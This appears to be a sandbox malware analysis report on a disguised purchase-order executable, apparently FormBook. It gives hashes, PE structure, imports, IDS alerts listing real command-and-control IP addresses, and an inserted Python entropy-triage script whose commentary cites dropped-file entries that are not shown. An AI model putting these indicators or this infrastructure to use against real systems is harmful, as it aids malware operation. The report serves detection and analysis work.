                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.135919783223942
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:PO_987654345678.exe
                        File size:1'250'816 bytes
                        MD5:4214be98801c44f69b60490a3321e940
                        SHA1:df33635a4f458821d10ce62860a043a960ced09f
                        SHA256:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07
                        SHA512:4f24a5ab7dc49ebbccae771dacdd4dd630d57b5691790527f2896d6547318edc846b4bb294b7cf49cc156c234a8d38fc9511c782d7008538b419d626c2d5d413
                        SSDEEP:24576:vqDEvCTbMWu7rQYlBQcBiT6rprG8aVnLgmDaEBVycKdrd8gx:vTvC/MTQYxsWR7aVnLv2msrSg
                        TLSH:A745CF0273D1C062FF9B92334F5AE6515BBC69260123E61F13A81DB9BE701B1563E7A3
                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                        Icon Hash:aaf3e3e3938382a0
                        Entrypoint:0x420577
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66D4F8E6 [Sun Sep 1 23:29:42 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:948cc502fe9226992dce9417f952fce3
                        Instruction
                        call 00007F8C448C7663h
                        jmp 00007F8C448C6F6Fh
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F8C448C714Dh
                        mov dword ptr [esi], 0049FDF0h
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FDF8h
                        mov dword ptr [ecx], 0049FDF0h
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F8C448C711Ah
                        mov dword ptr [esi], 0049FE0Ch
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FE14h
                        mov dword ptr [ecx], 0049FE0Ch
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        and dword ptr [eax], 00000000h
                        and dword ptr [eax+04h], 00000000h
                        push eax
                        mov eax, dword ptr [ebp+08h]
                        add eax, 04h
                        push eax
                        call 00007F8C448C9D0Dh
                        pop ecx
                        pop ecx
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        lea eax, dword ptr [ecx+04h]
                        mov dword ptr [ecx], 0049FDD0h
                        push eax
                        call 00007F8C448C9D58h
                        pop ecx
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        push eax
                        call 00007F8C448C9D41h
                        test byte ptr [ebp+08h], 00000001h
                        pop ecx
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x5ab0c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12f000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x5ab0c | 0x5ac00 | 8b0b669b687608340c32630295e56c2f | False | 0.9275891012396694 | data | 7.893638866117766 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12f000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
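The dropped-file entries above carry an 8-bit entropy (7.99 for the two 289,280-byte blobs, which the report marks Encrypted: true) and the section table repeats the same metric per section next to an MD5 of each section's raw bytes. The script below is an added example, not Joe Sandbox's code: it reproduces those columns from a PE's section table with the standard library only and adds three triage flags (high entropy, writable-and-executable, virtual size larger than raw size). The 7.0 threshold, the builder that emits a synthetic non-loadable PE, and the sample section contents are assumptions made for the example; the only tie to the analysed sample is that the constructed .text bytes encode the push ebp / mov ebp,esp / push esi / push dword ptr [ebp+08h] / mov esi,ecx prologue from the entry-point listing.

```python
"""Section-level PE triage with the standard library only (added example, not sandbox code).

Reproduces the Name / Virtual Address / Virtual Size / Raw Size / MD5 / Entropy columns
of a section table and the 8-bit entropy reported for dropped files, then adds triage
flags. build_synthetic_pe() emits a PE-shaped file that is NOT loadable (no optional
header); it exists only to give parse_sections() constructed input.
"""
import hashlib
import math
import struct

IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
HIGH_ENTROPY = 7.0  # assumed triage threshold, not a value taken from the report


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant block, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk the COFF section table and describe each section the way the report does."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    first = coff + 20 + size_opt                          # section headers follow the optional header
    rows = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, first + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        ent = entropy(raw)
        flags = []
        if ent >= HIGH_ENTROPY:
            flags.append("high-entropy: packed or encrypted content likely")
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            flags.append("writable and executable")
        if vsize > raw_size:
            flags.append("virtual size exceeds raw size: zero-filled at load (.bss or unpack space)")
        rows.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                     "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
                     "md5": hashlib.md5(raw).hexdigest(), "entropy": ent, "flags": flags})
    return rows


def build_synthetic_pe(sections) -> bytes:
    """sections: [(name, virtual_size, raw_bytes, characteristics)] -> minimal PE-shaped bytes."""
    file_align, sect_align = 0x200, 0x1000
    header_len = 0x40 + 4 + 20 + 40 * len(sections)
    data_start = -(-header_len // file_align) * file_align
    raw_ptr, va, table, blobs = data_start, sect_align, b"", b""
    for name, vsize, raw, chars in sections:
        raw_size = -(-len(raw) // file_align) * file_align if raw else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), vsize, va, raw_size,
                             raw_ptr if raw_size else 0, 0, 0, 0, 0, chars)
        blobs += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += -(-max(vsize, 1) // sect_align) * sect_align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0122)  # i386, EXE|LAA|32BIT
    return (dos + b"PE\0\0" + coff + table).ljust(data_start, b"\0") + blobs


# Constructed sections. .text carries the byte encoding of the prologue in the report's
# entry-point listing (push ebp / mov ebp,esp / push esi / push [ebp+08h] / mov esi,ecx).
SAMPLE_SECTIONS = [
    (".text", 0x1C2, b"\x55\x8b\xec\x56\xff\x75\x08\x8b\xf1" * 50, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", 0x200, b"\0" * 0x200, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", 0x400, bytes(range(256)) * 4, IMAGE_SCN_MEM_READ),  # every byte value 4 times: entropy 8.0
    (".bss", 0x1000, b"", IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]


def demo() -> list:
    return parse_sections(build_synthetic_pe(SAMPLE_SECTIONS))


if __name__ == "__main__":
    for s in demo():
        print(f"{s['name']:<6} va=0x{s['virtual_address']:x} vsize=0x{s['virtual_size']:x} "
              f"raw=0x{s['raw_size']:x} md5={s['md5']} entropy={s['entropy']:.3f} {s['flags']}")
```

For a real file, call parse_sections(open(path, "rb").read()); entropy() alone is enough to reproduce the Entropy (8bit) line of a dropped-file entry. A section with no raw bytes (the .bss case) hashes to the MD5 of the empty string and scores 0.0, which is why the raw-size column matters when comparing section hashes across samples.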
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x51dd2 | data | | | 1.0003310330019026
RT_GROUP_ICON | 0x12e58c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12e604 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x12e618 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12e62c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x12e640 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x12e71c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                        DLLImport
                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                        PSAPI.DLLGetProcessMemoryInfo
                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                        UxTheme.dllIsThemeActive
                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, 
lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll: GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll: EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll: DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-09-03T10:44:01.742289+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64979 | 80 | 192.168.2.4 | 154.23.184.240
2024-09-03T10:44:01.742289+0200 | TCP | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 64979 | 80 | 192.168.2.4 | 154.23.184.240
2024-09-03T10:45:04.484356+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64995 | 80 | 192.168.2.4 | 5.144.130.52
2024-09-03T10:45:07.030105+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64996 | 80 | 192.168.2.4 | 5.144.130.52
2024-09-03T10:45:39.695804+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65001 | 80 | 192.168.2.4 | 161.97.168.245
2024-09-03T10:46:04.760330+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65008 | 80 | 192.168.2.4 | 218.247.68.184
2024-09-03T10:45:34.598530+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64999 | 80 | 192.168.2.4 | 161.97.168.245
2024-09-03T10:46:51.843934+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65019 | 80 | 192.168.2.4 | 188.114.97.3
2024-09-03T10:46:37.934520+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65015 | 80 | 192.168.2.4 | 85.159.66.93
2024-09-03T10:44:33.730485+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64989 | 80 | 192.168.2.4 | 162.0.239.141
2024-09-03T10:45:47.751813+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65003 | 80 | 192.168.2.4 | 3.33.130.190
2024-09-03T10:44:41.933384+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64991 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T10:44:28.528096+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64987 | 80 | 192.168.2.4 | 162.0.239.141
2024-09-03T10:46:54.223315+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65020 | 80 | 192.168.2.4 | 188.114.97.3
2024-09-03T10:43:49.860515+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64976 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T10:46:18.924552+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65012 | 80 | 192.168.2.4 | 13.248.169.48
2024-09-03T10:46:02.214733+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65007 | 80 | 192.168.2.4 | 218.247.68.184
2024-09-03T10:45:09.574571+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64997 | 80 | 192.168.2.4 | 5.144.130.52
2024-09-03T10:46:16.082124+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65011 | 80 | 192.168.2.4 | 13.248.169.48
2024-09-03T10:43:52.570998+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64977 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T10:44:31.069926+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64988 | 80 | 192.168.2.4 | 162.0.239.141
2024-09-03T10:44:44.455444+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64992 | 80 | 192.168.2.4 | 199.59.243.226
2024-09-03T10:44:07.048957+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 64981 | 80 | 192.168.2.4 | 154.23.184.240
2024-09-03T10:46:43.036728+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 65017 | 80 | 192.168.2.4 | 85.159.66.93
